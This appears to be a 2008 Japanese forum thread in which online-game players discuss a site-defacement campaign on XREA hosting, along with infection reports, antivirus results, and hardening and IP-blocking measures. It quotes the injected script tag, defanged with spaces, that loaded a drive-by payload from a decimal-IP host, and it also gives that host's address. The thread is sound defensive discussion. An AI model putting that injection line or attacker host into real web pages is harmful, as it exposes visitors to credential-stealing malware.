問題があると癌に苦情入れれば公認が取り消されるかもって話だから <> （○口○*）さん<>sage<>08/08/08 23:31 ID:h5Peya/60<> >>652
段階踏むのは当然として、最終的に「対処されないなら公認取り消しを期待」。
対処されればそれでよし、公認取り消されれば行くこともなくなるから
（地域によっては不便になるけど）それもまたよし。 <> （○口○*）さん<>sage<>08/08/09 02:32 ID:xUyroPuL0<> つーか、ネカフェでROをやらなければいいんじゃね？

どうしてもネカフェ限定Dやらで遊びたいなら、携帯端末から癌IDを
変更出来る環境にするしかないのかも。

IE6以上搭載の携帯端末ってEeePCやWillcomD4ぐらいな気が
しないでもないが…… <> （○口○*）さん<>sage<>08/08/09 02:58 ID:37o0L1mv0<> いまどきの携帯電話にはフルブラウザというのがあってだな <> （○口○*）さん<>sage<>08/08/09 03:48 ID:buMkOlHZ0<> して携帯のフルブラウザはActiveXが動くのかね。
そう遠くないうちにActiveX動作環境じゃないと癌IDにもログインできなくなるんだぜ。 <> （○口○*）さん<>sage<>08/08/09 04:42 ID:nP1G4p460<> ネカフェでやりたいなら自前のノートPC持っていってつなぐとか
垢ハク系のウイルスならLANつないだくらいなら感染しないと思うし。 <> （○口○*）さん<>sage<>08/08/09 07:21 ID:t6ZjKs770<> 実装のしかたによっては2PC組死亡だよな、これ。 <> （○口○*）さん<>sage<>08/08/09 07:22 ID:v13IUzO70<> そもそも癌IDごと抜かれたら携帯使おうがどうしようが無駄な気がするんだが <> （○口○*）さん<>sage<>08/08/09 10:09 ID:4/QBXae+0<> jpg偽造垢ハクURLをjaneなど専用ブラウザで開いた場合でも感染する事はあるのでしょうか？ <> （○口○*）さん<>sage<>08/08/09 11:48 ID:o3qYEOW10<> あるかないかなら「ある」 <> （○口○*）さん<>sage<>08/08/09 12:01 ID:0bqYHXRn0<> いつも右クリックで一旦保存して、ウイルススキャンしてから開くなぁ <> （○口○*）さん<>sage<>08/08/09 12:22 ID:W/yEfU9P0<> 難しい質問だね
画像ファイルに関して、現在「既知で未修正の脆弱性」ってあるの？ <> （○口○*）さん<>sage<>08/08/09 12:27 ID:S0oEzj1m0<> 未知の脆弱性が否定できないから>>663 <> （○口○*）さん<>sage<>08/08/09 13:06 ID:0MNaemeK0<> まーたXREAがやばいらしい。複数サイトで確認。
犯人は6月の広告改ざんと同一(サーバは同じでポートだけと違う(81→88))。

793 ：名も無き軍師：08/08/07 22:04:32
　さきほど気付いたのですが、8月2日23時45分頃～今まで、
　テンプレサイト内のほぼ全ページに、
　謎のスクリプトが、仕込まれてしまっていたようです。
　仕込まれていたのは、下記のようなものです。
　<script src= h t t p : // 1039045744 : 88 / jp.js ></script>
　↑↑危険かもしれないので、一部スペースを入れ、アクセスできないように書いています。 <> （○口○*）さん<>sage<>08/08/09 13:38 ID:L1hg5O7a0<> >>667

h t t p : // 1039045744 : 88 / jp.js
→ h t t p : // 1039045744 : 88
→→ h t t p : // 1039045744 : 88 / show.php
→→ http://ct2■shinobi■jp/sc/1107966

height=0 な辺りが、とても胡散臭いですね。 <> （○口○*）さん<>sage<>08/08/09 15:50 ID:W/yEfU9P0<> ttp://pc11.2ch.net/test/read.cgi/hosting/1214916712/466

466 名無しさん＠お腹いっぱい。 sage 2008/08/09(土) 15:04:59

同人板XREAスレにも注意勧告北

※注意願います※
8/2頃からXREAサーバー利用者のサイトへの攻撃が再度確認されています。
今回の攻撃はサイトのhtmlソースを直接改変し罠サイトへの強制アクセススクリプトを仕込むというもの。
アクセス先は６月の罠広告に使われたウィルス置き場と同一です。

現在のところ被害報告は特定オンラインゲームの情報を取り扱うサイトのみですが、
ＩＤ・パスの漏洩によるものかARPスプーフによるものか原因が確定していません。
後者の場合、XREAサーバーにHPを持つサイトの多く（サイトの内容関係なく）が汚染されている可能性があります。

管理者の皆様、特にここ最近更新をさぼっている・放置しているサイト管理者は
ソースのチェック等対策をよろしくお願いします。 <> （○口○*）さん<>sage<>08/08/09 16:35 ID:FcuYoj+a0<> >>667
これ前回の広告にウィルス混入されてた時よりやばいんじゃね。
今度は広告じゃなくてウェブ上に置いてあったファイルのソースコードを直接書き換えられたらしいし。
無料、有料スペース関係なくxrea全体で感染の危険有りだぞ。 <> （○口○*）さん<>sage<>08/08/09 17:53 ID:0MNaemeK0<> >>670
かなりやばそうですねぇ。
FFのコミュミティの1つに
ttp://yy28.60.kg/ff11jobjobplus/
というジョブ別の板がある。
FFには20ほどジョブがあり、ジョブ別の各スレのうち
テンプレサイトにXREAを使っているのは
4つ(サーバはバラバラ。netbenriもXREA)で、
その全てがやられている。
犯人はその気になればXREAの全て(あるいはいくつか)のレンサバの
全てのコンテンツに好きな注入ができるものと思われる。

広告の時にバックドアでも仕掛けられたのか、
広告の時の穴がそのままなのか、後者ならさくらの時か…? <> （○口○*）さん<>sage<>08/08/09 17:57 ID:ToB7YhNC0<> もうやめてー；；
ｘれあのHPはゼロよ！ <> （○口○*）さん<>sage<>08/08/09 18:00 ID:0MNaemeK0<> 2ch同人板XREAウイルススレより

※注意願います※
8/2頃からXREAサーバー利用者のサイトへの攻撃が再度確認されています。
今回の攻撃はサイトのhtmlソースを直接改変し罠サイトへの強制アクセススクリプトを仕込むというもの。
アクセス先は６月の罠広告に使われたウィルス置き場と同一です。
現在のところ被害報告は特定オンラインゲームの情報を取り扱うサイトのみですが、
ＩＤ・パスの漏洩によるものかARPスプーフによるものか原因が確定していません。
後者の場合、XREAサーバーにHPを持つサイトの多く（サイトの内容関係なく）が汚染されている可能性があります。
管理者の皆様はソースのチェック等対策をよろしくお願いします。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/08/09 18:49 ID:si0TyLsV0<> 資料室さんのウイルス更新データを見つつ
オリンピック始まる二日ぐらい前から
件数が少なくなってきた事を体感で感じていたのですが、
一時的にとはいえ開会式休みなのか新規分が発見されなかった？みたいです。

>>667 >>668
ソースでぱっと見ではshinobiの
アクセス解析かと思ったのですが違うのですね。
ホスト対策ではどうにもならない所なので
PG2でリストを作って制限できればいいのですが。 <> （○口○*）さん<>sage<>08/08/09 19:06 ID:W/yEfU9P0<> >>673
おちついてください。 <> （○口○*）さん<>sage<>08/08/09 19:10 ID:gLQC0aiA0<> >>673
>>669

頻繁にチェックする・ハックに迅速に対応するしかないのかね <> （○口○*）さん<>sage<>08/08/09 20:56 ID:0MNaemeK0<> >>674
shinobiのはアク解析。show.phpからFlashを呼びにいく。 <> （○口○*）さん<>sage<>08/08/09 21:09 ID:3XqyqoqC0<> サイト所持者はFTPで接続して
身に覚えのない時間に更新されてるhtmlファイルがないかのチェックで大丈夫？ <> （○口○*）さん<>sage<>08/08/09 21:39 ID:0MNaemeK0<> んだね。ソース表示して1039045744で検索でもいいけど。 <> （○口○*）さん<>sage<>08/08/09 21:55 ID:L1hg5O7a0<> 61.238.148.112 をインターネットオプションの制限サイトに加えてみた。
効果あると良いんだけど。 <> （○口○*）さん<>sage<>08/08/09 22:03 ID:8TaxQB2P0<> これはそのページを開くとウイルスページに飛ばされるの？ <> （○口○*）さん<>sage<>08/08/09 22:09 ID:0MNaemeK0<> scriptだから0サイズiframeと同じで表面的には見えない。
使う脆弱性はFlashPlayer。9.0.124未満なら終了。 <> （○口○*）さん<>sage<>08/08/10 00:12 ID:nURxai6H0<> サイトのhtmlソースを直接改変って事は、閲覧時にhtmlを生成してるwikiは
今回の攻撃を免れてる率が高い？ <> （○口○*）さん<>sage<>08/08/10 00:21 ID:+pcfg1zy0<> 直接いじれるならwikiそのものも管理者と同程度にいじれるんじゃなかろうか <> （○口○*）さん<>sage<>08/08/10 06:13 ID:v9kPgjRZ0<> root権限を掌握されているか、それに近い状態なら、phpに直接細工をされてPukiWikiのヘッダやフッタに出力される
可能性もあるし、CSSに何かを書かれるかもしれない。
あるいは、そんな面倒な事をせずとも、ダミーのindex.htmlを設置して、攻撃サイトを読み込ませつつ本来のindex.phpへ
リダイレクトする手法を取ってくるかもしれないし。 <> （○口○*）さん<>sage<>08/08/10 15:23 ID:Mn9l/gmb0<> xreaやばいってWikiだけ？
狩場情報ひっそりとかもやばいのかな？ <> （○口○*）さん<>sage<>08/08/10 15:49 ID:/a1Lr0SP0<> (；´Д｀) <> （○口○*）さん<>sage<>08/08/10 17:54 ID:Dffgt0gD0<> 頼むから理解力を身につけてくれ <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/08/10 19:05 ID:K1yIHZRh0<> >677
つっこみありがとうございます。
swf自体がいつもの罠なのですね。その事を失念していました。

今更なのですが試しに手持ちのサイトとか複数を
pingコマンドでIPを調べてPG2でブロック設定にして
その設定にしたアドレスをロングIPアドレスに変換して直打ちしたら
読み込みに行くけど画面は白いままで履歴にはブロックと表示されました。

BS-Wikiさんと資料室さんのPG2ブロックリストには
61■238■148■112は追加されているので
これらを導入しているなら大丈夫かも…？ <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/08/10 19:25 ID:K1yIHZRh0<> ああ･･でも今ある罠IPが変更される様な事があったり
同じ手を別会社のサーバーでやられたりとかしたら意味が無いのか…。
うーん、XREAサーバーの被害だけで済む問題だといいのですが。

現状とにかくこまめにhtmlを更新するしかないんでしょうね。 <> （○口○*）さん<>sage<>08/08/11 04:11 ID:MrVlTYiG0<> 【　　　気付いた日時　　　　　】先ほど
【不審なアドレスのクリックの有無　】記憶になし
【他人にID/Passを教えた事の有無】無
【他人が貴方のPCを使う可能性の有無】無
【　　ツールの使用の有無　　　】無
【　ネットカフェの利用の有無　　　】無
【　　　 OS　　】 WindowsXP Professional SP3
【使用ブラウザ】 IE7
【WindowsUpdateの有無】毎月更新済み
【　アンチウイルスソフト】 Norton360Online
【その他のSecurty対策】無
【ウイルススキャン結果】カスペルスキーオンラインスキャンにて
　C:\Program Files\Siber Systems\AI RoboForm\roboform.dll に　Backdoor.Win32.Rbot.sxq を検出
ウイルスバスターオンラインスキャン及びNotonでは検出できず
【スレログやテンプレを読んだか】多少
【hosts変更】　不明
【PeerGuardian2導入】無
【説明】
ふとカスペルスキーオンラインスキャンをかけてみたところ
ロボフォームのフォルダからBackdoor.Win32.Rbot.sxq が検出されました
ウイルスバスターオンラインスキャン及びノートンでは検出されず、カスペルスキーの誤認識かと思ったのですが
ログをよむと洒落にならない部類のウイルスのようだったので不安になりました
別PCにてパスワードは変更済みです <> （○口○*）さん<>sage<>08/08/11 04:35 ID:tSE3vAQ60<> 誤検知じゃねーの? <> （○口○*）さん<>sage<>08/08/11 06:35 ID:dSQG/s0F0<> >>691
カスペ 8/11 3:11:52のパターンで、WinXP＋AIロボフォームで検知なし。
再度オンラインスキャンしてみてくれ。それで検出しなくなってたら、誤検出だったってことだろう。 <> （○口○*）さん<>sage<>08/08/11 06:51 ID:MrVlTYiG0<> 再度のオンラインスキャンの結果今度は検知されませんでした
お騒がせして申し訳ありませんでした <> （○口○*）さん<>sage<>08/08/11 12:41 ID:tSE3vAQ60<> XREAサポートフォーラムより

ttp://sb.xrea.com/showthread.php?t=12960
外部ユーザー様から通報いただいた1サイトのみの確認ですが、
ログから判断しますと、
スクリプト経由で書き換えられている可能性が高いと思われます。
スクリプト自体を最新にする
.htaccess に
php_flag allow_url_fopen off
php_flag allow_url_include off
php_flag register_globals off
を記述する
万全ではありませんが、下記の方法でアクセス制限をする
ttp://sb.xrea.com/showpost.php?p=77290&postcount=3
といった対策があります。
他に数サイトあるようですが、他のサイトはまだ把握しておりません。
また、最新ではないXOOPS運用サイトでもなどでも
同様の改ざんがされることを確認できております。
なお、上記PHP設定項目が旧サーバーでOnになっているサーバーは、
アップデート時にサーバー側でOffに変更させていただいております。
ttp://sb.xrea.com/showthread.php?p=83962#post83962 <> （○口○*）さん<>sage<>08/08/11 12:59 ID:MaYC3PEa0<> CMSへの移行って一時期すごく流行ったんだが、
バージョンアップなど適切な処置を施さなかったりすると後で
痛いしっぺ返しを食らうのも事実だ。

企業で管理しているところをレンタルする方がいいのかもしれない。
もちろんその企業の質も肝心だが。 <> （○口○*）さん<>sage<>08/08/11 13:03 ID:tSE3vAQ60<> phpBBとか入れ食いだもんなぁ <> （○口○*）さん<>sage<>08/08/11 13:23 ID:f93M3FP10<> >695
そこ見ると改竄喰らったのはpukiwikiで、css.php又はskin.php辺りがスクリプト経由で改竄されたっぽい。

>683
というわけで、xreaの職Wiki等、全部確認しないと不味いかもしれない。
トップページ開いて 1039045744 の記述が無ければ(今のところ)被害を免れてると考えていいと思う。 <> （○口○*）さん<>sage<>08/08/11 14:23 ID:F4pZuxCY0<> いちおう明記しておくと、>>695のリンク先によると
（mod_rewriteによってSEO対策に）URLが～.htmlになるような
仕掛けがあったただのpukiwikiサイトだったらしい。
だからただのHTMLファイルが書き換えられたわけではなく
>>678とかは関係なかった。

>>698
鯖の設定が絡むようだとはいえ手口が（いくつか想像はできるけど）
はっきりしない以上はpukiwikiそのものの脆弱性と考えるべきで
現時点ではxreaに限らない方がよいと思う。
もしかしたらプラグインのせいかもしれないけど。

あの書き方だとregister_globalsで汚染された変数を使ってurl_fopen等を
行ってしまったのかな？でもそんなんでPHPソース書き換えまで
できるんだろうか。

・・・セキュリティホール memoでここのスレが2chとして紹介されてた。
2chにも同じタイトルのスレがあるのかと思ってしまったｗ
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2008/08.html#20080810_tuiki <> （○口○*）さん<>sage<>08/08/11 15:30 ID:BJx9t2WU0<> 2chと他のBBSとの区別が出来ないひとが、セキュリティを論じるのは怖いですね。 <> （○口○*）さん<>sage<>08/08/11 15:34 ID:tSE3vAQ60<> ( ´_ゝ`)ﾌｰﾝ <> （○口○*）さん<>sage<>08/08/11 15:34 ID:iVNTMNRS0<> 似たようなもの。 <> （○口○*）さん<>sage<>08/08/11 15:37 ID:5MHtlkRN0<> 別にセキュリティーを論じているサイトじゃないんだけどな
ただのリンクサイトだよ <> （○口○*）さん<>sage<>08/08/11 15:49 ID:StSDYmgU0<> まあmmobbsの発祥まで遡ると2chだし、別にどっちでもいいさね。

しかし、xreaが抱えてるかもしれない脆弱性が原因にしろ、pukiwikiが抱えてるかもしれない脆弱性が原因にしろ
利用者側からすれば、同じことで。

結局の所、利用者側が打てる対策としては、現時点でPG2を使って中韓台を防ぐのが一番確実って事かな。

サイト・Wiki管理者の場合は、怪しいタイムスタンプのファイル・モジュールが無いかチェック。
タイムスタンプでの判断が取れない可能性を考えると、ローカルにあるだろう
Pukiwiki等の
各種モジュールを再アップロードで上書き、ぐらいか？

なんにせよ、面倒としか言いようが無いな…… <> （○口○*）さん<>sage<>08/08/11 15:58 ID:0spZVVLB0<> >>700
何を言うのも自由だが、あそこはかなりの有名どころだから気をつけな。 <> （○口○*）さん<>sage<>08/08/11 16:44 ID:tSE3vAQ60<> こっちに書くの忘れてたんでコピペ。

今回XREAに仕掛けられていたのを踏んで投下されるのは
「wzcsvbxm.dll」じゃなくて信長の野望Onlineで話題になっていた(らしい)
「KernaeghDrv.dll」ね。
英Sophosの検出名「Troj/Lineag-DV」の
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojlineagdv.html
の「More Information」参照。 <> （○口○*）さん<>sage<>08/08/11 18:40 ID:n+QuYAra0<> あそこは、実質JPCERT/CCのなかのひとのサイトなのだがな。
go.jp相手に喧嘩でも売りたいのかね。 <> （○口○*）さん<>sage<>08/08/11 19:51 ID:qFS31QWa0<> go.jpに「2ch」と「2ch風」を区別しろってほうが無理な話だw <> （○口○*）さん<>sage<>08/08/11 19:54 ID:tSE3vAQ60<> というか区別しようがしまいがどうでもいいこと。 <> （○口○*）さん<>sage<>08/08/11 21:41 ID:mMLNOFuW0<> しかし、わざわざドメインを括弧書きで併記してる意味が無いよなぁ。 <> （○口○*）さん<>sage<>08/08/11 22:20 ID:nk4kmN/D0<> つーか被害報告上がってる４件のサイトのうち、
Pukiwiki形式のって一つしかないんだけど。 <> （○口○*）さん<>sage<>08/08/11 23:21 ID:InhHVqPT0<> >711
だから？

1件でも喰らってるなら安全とは言えない。
ましてや、どの穴を突かれたか確定してるわけじゃないんだし。 <> （○口○*）さん<>sage<>08/08/11 23:32 ID:+pJPNQdh0<> >>712
うん、それで？ <> （○口○*）さん<>sage<>08/08/11 23:34 ID:R76qfwZv0<> 言葉通りじゃないの？くだらない騙りは邪魔だから消えなよ <> （○口○*）さん<>sage<>08/08/12 00:13 ID:u5x31VQk0<> >>712
いや、だからPukiwikiが安全だ、なんて言うつもりは無くって。
PHP使ってないサイトも同時にやられてるからさ。
なんかもっと大きな穴開いてるんじゃないかなー、と。
そうふっと思っただけ、ごめん <> （○口○*）さん<>sage<>08/08/12 09:14 ID:Hoelhr400<> 悪魔の証明って言葉を思い出した <> （○口○*）さん<>sage<>08/08/12 12:45 ID:w37pcy550<> 先週XREAに仕掛けられたトロイが更新。
ttp://www.virustotal.com/analisis/ccc234390e5b7a6c342d589bf2a33038
× Norton McAfee AntiVir avast AVG BitDefender ソースネクスト(笑) 他多数
これはひどい…。各社に提出済み。 <> （○口○*）さん<>sage<>08/08/12 12:55 ID:UpmI8YaO0<> マルチか転載かもうわかんねぇ
最近、xreaスレとここが混同というか見間違えるんだよ <> （○口○*）さん<>sage<>08/08/12 13:25 ID:w37pcy550<> バスターが抜けてた。もちろん×。 <> （○口○*）さん<>sage<>08/08/12 13:57 ID:w37pcy550<> >>699
(typo fixed: いちネトゲファンさん感謝)
ﾜﾛｽ <> （○口○*）さん<>sage<>08/08/12 15:29 ID:IO4Namu40<> ついさっきカスペ先生がKernaeghDrv.dllを検出＼(^o^)／
自分じゃ全く踏んだ覚えないのに怖すぎるな。
しばらくはRO関係のサイトは見ないほうがいいかもなあ <> （○口○*）さん<>sage<>08/08/12 15:32 ID:w37pcy550<> >>721
どこかのXREAサーバで踏んだんだね。 <> （○口○*）さん<>sage<>08/08/12 16:53 ID:1R5trZm60<> coreserver　は安全なんだろうか？
XREA系の上位サーバーだが

２つほどこっちで稼動していてるWikiがあるので。
（rowiki.jpアドレス中４つがcoreserverに向いてるようだし <> （○口○*）さん<>sage<>08/08/12 17:20 ID:Hoelhr400<> >>723
coreでは聞いたこと無いなあ。
問題は「手口」なんだけれどね。 <> （○口○*）さん<>sage<>08/08/12 18:20 ID:jLTWlM7R0<> typo...? <> （○口○*）さん<>sage<>08/08/12 18:23 ID:KX8SR7Fv0<> タイプミスを示す言葉だよ <> （○口○*）さん<>sage<>08/08/12 18:23 ID:2RjReR3w0<> まずぐぐれ <> （○口○*）さん<>sage<>08/08/12 19:17 ID:jLTWlM7R0<> そうじゃなくて、セキュリティホールmemoの人。
2ch.netって書いていたのをmmobbs.comに直したことをtypoって、苦しくないか？ってこと。 <> （○口○*）さん<>sage<>08/08/12 19:23 ID:PswjeVWp0<> >728
>709 <> （○口○*）さん<>sage<>08/08/12 19:27 ID:KX8SR7Fv0<> ここで叫いてないで、メールでもして本人に聞いてください <> （○口○*）さん<>sage<>08/08/12 21:01 ID:RKRcVtQD0<> セキュmemoが左寄りだからって、こんな目の届かないところで粘着していても見苦しいだけですよ。 <> （○口○*）さん<>sage<>08/08/12 21:05 ID:UpmI8YaO0<> jLTWlM7R0は何か恨みでもあるのかね？
アレゲな人とか <> （○口○*）さん<>sage<>08/08/12 22:33 ID:qS3WyNOG0<> 単に気になっただけじゃないの <> （○口○*）さん<>sage<>08/08/12 22:48 ID:rHy3yVzx0<> xreaのIPまとめて全部ファイアウォールに突っ込むほうが
面倒なくていいような気すらしてくるのは気のせいか…？ <> （○口○*）さん<>sage<>08/08/12 22:50 ID:WRYlvnR60<> …？ <> （○口○*）さん<>sage<>08/08/12 23:02 ID:w37pcy550<> >>734
誰がまとめてくれるんだ…? <> （○口○*）さん<>sage<>08/08/12 23:47 ID:eVhkSLDc0<> a. [JPNICハンドル] KH5915JP
g. [Organization] DIGIROCK,INC.
[最終更新] 2007/02/22 03:20:06(JST)
db-staff@nic.ad.jp
[参照] NET/59.139.29.96/27
[参照] NET/59.139.29.224/27
[参照] NET/60.32.200.64/27
[参照] NET/60.32.201.96/27
[参照] NET/125.53.24.64/27
[参照] NET/125.53.24.128/27
[参照] NET/125.53.25.0/27
[参照] NET/125.53.25.32/27
[参照] NET/125.53.25.224/27
[参照] NET/125.53.26.0/27
[参照] NET/202.229.187.24/30
[参照] NET/210.153.88.112/30
[参照] NET/210.172.108.224/27
[参照] NET/210.196.169.192/27
[参照] NET/210.196.173.48/28
[参照] NET/210.196.176.176/28
[参照] NET/210.251.253.224/27
[参照] NET/218.216.67.32/27
[参照] NET/219.101.229.128/26
[参照] NET/219.163.5.176/28
[参照] NET/219.163.200.64/26
[参照] NET/221.186.251.64/26
[参照] NET/222.227.75.0/27
[参照] NET/222.227.75.32/27
[参照] NET/222.227.75.96/27
[参照] NET/222.227.75.128/27 <> （○口○*）さん<>sage<>08/08/12 23:59 ID:eVhkSLDc0<> >>737の補足情報。
ttp://setup.value-domain.com/index.php?p=srvip
恐らく、前述のCIDRに全部含まれている筈。 <> （○口○*）さん<>sage<>08/08/13 02:43 ID:C+6c64Xl0<> >>738
xreaはs350ぐらいまで存在してるから、全部は載ってないみたいだなぁ <> （○口○*）さん<>sage<>08/08/13 03:46 ID:iRWCUDAY0<> >>734

やれば？
デジロックを全部ブロックすると
大半の職テンプレ見れなくなるけど

わかる範囲で以下だけが例外になる
・未実装Wiki
・クエスト案内所/ragfun.netミラー(ragna.infoはCORESERVER)
・弓手Wiki、マジテンプレ、NPC、セキュ
・SageWiki
・リンカーWiki
・効率Wiki

他全部XREAかCORESERVER <> （○口○*）さん<>sage<>08/08/13 03:49 ID:PypKkh3m0<> 個人的には、FireFoxかSleipnirどっちかを導入して、標準状態では
JavaScript、ActiveX、Javaアプレット全てが無効な設定にして、
職WikiやXrea系サイトやRO関連blogなど罠が仕込まれる可能性が
高いサイトを閲覧するときは全部無効なブラウザを使う、というのを
提唱してみる。 <> （○口○*）さん<>sage<>08/08/13 03:57 ID:UDgDnGuc0<> JavaScript、ActiveX、Javaアプレットの禁止に加えてクッキー拒否をデフォルト設定にしてる
どうしても必要なサイトだけ許可するってホワイトリスト方式 <> （○口○*）さん<>sage<>08/08/13 04:13 ID:iRWCUDAY0<> と言うか公式サイトが罠仕込まれる時代だってのを忘れちゃいけない。
他ゲーだけど「スカッとゴルフパンヤ！」の公式に罠が仕込まれたのは新しいと思う。

外国では企業サイトの数十％が改ざんされたとか言う話もある
そんなＩＰ帯全部をブロックするよりは
自分たちが気をつけれるべきだと思うよブラウザーを少しでも安全性高いのにするとか

いっそWeb閲覧用のMacでも入れちまえってのが個人の本音だけどな。
MacはActiveXはいまだに対応してねーし

とか思うわけよ。

第一XREAだからCORESERVERだからってはじいていたらさくらインターネットもやばくなる
（同じような脆弱性を突かれた過去がある）
そうなるとさくらまで～っていうと（入れるのを忘れたが）アサWiki、リンカーWiki、
SageWiki及びクエスト案内所ragfun.netミラーも危険サーバーで運用とか言うことになる

他有名サイトならラグナロクネットワーク、ROM776、OWN、D-Site、アコマニなんかも見れなくなるぞ。

なんか色々含ませると自衛のほうが早いと思うんだがな <> （○口○*）さん<>sage<>08/08/13 05:27 ID:tX3RK9Eh0<> この手の防衛で楽しようとするのが間違いだろ、そもそも <> （○口○*）さん<>sage<>08/08/13 07:03 ID:iRWCUDAY0<> >>744

一番簡単な方法はあるぞ
PCをインターネットに接続せずに隔離すればいい。
ウイルスに引っかからない最良にして簡単な方法だ

俺はネットにつながらないのいやだから
自己責任の上自衛をできるだけしてるけど <> （○口○*）さん<>sage<>08/08/13 08:31 ID:m/cF6nJd0<> 現実的なところでは、Webブラウズ専用の仮想環境を作っておくことかなあ。
もちろん簡単に初期化できるようにセットしておく。 <> （○口○*）さん<>sage<>08/08/13 09:22 ID:/B2lSDdf0<> VMWare+Ubuntuなら無料で簡単に導入できるが、PCのスペックが低いと
仮想環境は荷が重い。
現時点の傾向だと、中華は罠を中韓台香の鯖に罠本体を置いてるから
PG2でそこらをブロックするのが現実的、となりそう。

ただUS/UKなどを使われるとか、OSがVistaとかだとちょい問題がある。
他国ドメイン使われると対策は考え直しだし、Vistaに至ってはα版の
ものしかないし。

結局いたちごっこだし、万能な対策ってのは存在しないし、結局は
各自がベターと思われる方法を見つけるしかないんだよな <> （○口○*）さん<>sage<>08/08/13 09:25 ID:+0R4984z0<> 今はまだそれで良くても、ホスト先が現地でなくなったらアウトだよね。
アカウントハックを堂々とやる連中のことだ。次はFTPを狙ってWebスペースを
乗っ取ってくるかもしれん。 <> 748<>sage<>08/08/13 10:11 ID:+0R4984z0<> 乗っ取りといっても、サイトそのものを書き換えるんじゃなくて、ファイルを
コッソリと置かれたりしたら、ハッキングの事実すら気づきにくい。

とにかく管理放置されるとリスクが高いな。 <> （○口○*）さん<><>08/08/13 10:29 ID:dSB6fICC0<> 緊急(6) 重要(5)
http://www.microsoft.com/japan/technet/security/bulletin/ms08-aug.mspx

月例age <> （○口○*）さん<>age<>08/08/13 11:05 ID:UDgDnGuc0<> 今回は数が多いな

どれも今週には垢ハックに使われそうな予感 <> （○口○*）さん<>sage<>08/08/13 11:36 ID:/YYRg3sn0<> 【　　　気付いた日時　　　　　】昨夜
【不審なアドレスのクリックの有無　】 http:■■sddjp.net■sderyop■2008-11356.jpg
【他人にID/Passを教えた事の有無】No
【他人が貴方のPCを使う可能性の有無】No
【　　ツールの使用の有無　　　】No
【　ネットカフェの利用の有無　　　】 Yes
【　　　 OS　　】 XP　SP２
【使用ブラウザ】 FireFox2.0.0.16　／ Jue styl(verわからず）
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【　アンチウイルスソフト】 NOD32
【その他のSecurty対策】ルータはありますｇ、自身の知識不足いより不明
【ウイルススキャン結果】カスペルスキーオンラインスキャン：定義データの更新がエラーで実行できず
　　　　　　　　　　　　　　　NOD32ウィルススキャン：反応なし
【スレログやテンプレを読んだか】時間がなく、今夜読む予定
【hosts変更】無
【PeerGuardian2導入】無
【説明】
Junestyleにて閲覧中にURL画像リンクを表示。（ビューワｈJuestyle標準？）
その後のレスにて「カスペに反応があった等のレスがあり、スキャン等開始しました
現状、LAN引っこ抜き＋外付けHDDに必要バックアップ中。

帰省前になにやってんだ俺・・・来週戻ったらOS再インストール予定 <> （○口○*）さん<>sage<>08/08/13 12:05 ID:1RN6ifk20<> それはこのスレでも既出の危険アドレス
ホストが中華な時点でお察し <> （○口○*）さん<>sage<>08/08/13 12:06 ID:lBZUy8VH0<> XREAの新型、昨夜更新。今回はリネージュ2のパス抜きの模様。
ttp://www.virustotal.com/analisis/e03e26a5993402b293ba3d3e8609a8c0 <> （○口○*）さん<>sage<>08/08/13 16:53 ID:ZMluNJpc0<> 仮想環境でのWeb閲覧なら、ZoneAlarmのForceFiledはどうだろうか？
謡い文句通りなら、仮想PCの導入より敷居は低くて同等になるかも。

ttp://internet.watch.impress.co.jp/cda/news/2008/07/30/20431.html

ただ、何をどうやって仮想化なのか、よく分からんのだが……

ただ、何をどうやって仮想化なのか、よく分からんのだが……

ただ、何をどうやって仮想化なのか、よく分からんのだが…… <> （○口○*）さん<>age<>08/08/13 17:06 ID:UDgDnGuc0<> ForceFiledだと3回の攻撃で無力化してしまうのだろうか

とか変なことを思ってしまった <> （○口○*）さん<>sage<>08/08/13 17:19 ID:+0R4984z0<> >>755
よくわからんが、仮想環境みたいなものに閉じこめちゃうのかなあ？
そうしたら、悪意のあるプログラムであってもその外には出てこれない。 <> （○口○*）さん<>sage<>08/08/13 17:34 ID:UDgDnGuc0<> JavaScriptを仮想ブラウザ内で実行して、その結果をスキャン
安全なら本来のブラウザに渡すって感じの処理かなーとは思ったが
これだと穴があるし IE以外は未サポートとかになるな <> （○口○*）さん<>sage<>08/08/13 17:55 ID:4kkyE/eP0<> また。薬屋ｋ <> （○口○*）さん<>sage<>08/08/13 18:18 ID:V9eu5o1k0<> 未だに何が原因かよく分からないのが気持ち悪いんだよな＞XREA
「phpの穴」という鯖屋の主張がいまひとつ腑に落ちない。 <> （○口○*）さん<>sage<>08/08/13 18:22 ID:PypKkh3m0<> これをやるとすれば、Windowsから見ればアプリケーション層で動作する
仮想OSとセットになったWebブラウザ、みたいな実装にしないと
いけない。
これだと仮想OS側ではクライアントサイドスクリプトだのレンダリングだの
ActiveXだのは自前で実装してないといけない(ホスト側の機能を流用すると
そこを経由してホスト側にもれてしまって仮想環境の意味がない)ので、
最近のActiveXやJavaScriptがあって当然なWebにおいては難しい気が
する。

仮想環境のセキュリティ的な強みは「仮想環境の外からは自由に触れるけど
仮想環境の中からは自分が仮想環境であることがわからないし、仮想環境の
中からホストへのアクセスもできない(ホストから取りに行くことはできる)」
ということで、これはつまり、利便性が低いという弱みでもあるんだよな。

だから、どうしてもホストと仮想環境の間にはVMWareとかVirtualPCみたいな
「中からは自分が仮想環境であることが基本的にわかりません」ってものを
用意してもうワンレイヤ噛ませないと、仮想環境のセキュリティ的な強みを
享受することは非常に難しい。

実物触ったわけでもないし、記事とプレスリリースだけでの判断なんだけど、
こんなふうに思った。 <> （○口○*）さん<>sage<>08/08/13 18:31 ID:dSB6fICC0<> ブラウザやPFWだけでは限界があるし、他の方法も併用する事によって安全への担保を高めていかないと駄目だな。
例えば、HIPSとしては有名どころのUnleak。 -> ttp://soft3304.net/Unleak/
レジストリの変更操作を監視する事によって、検知をすり抜けたマルウェアの改竄動作を水際で食い止めるのに役立つ。

また、M$製品以外の脆弱性を見つけるのに有用なソフトもある。
Secunia PSI -> ttps://psi.secunia.com/
M$が提供しているMBSAというセキュリティアナライザがあるが、上記のものはサードパーティ全般を対象に拡げたようなソフト。
インストールしたまま塩漬けにされていたり、何らかの理由で脆弱性を抱えたままのコンポーネントを見つけ出すのに有用。 <> （○口○*）さん<>sage<>08/08/13 18:55 ID:rthokXPV0<> ZAのは説明読む限り、眉唾な感じが拭えないなぁ
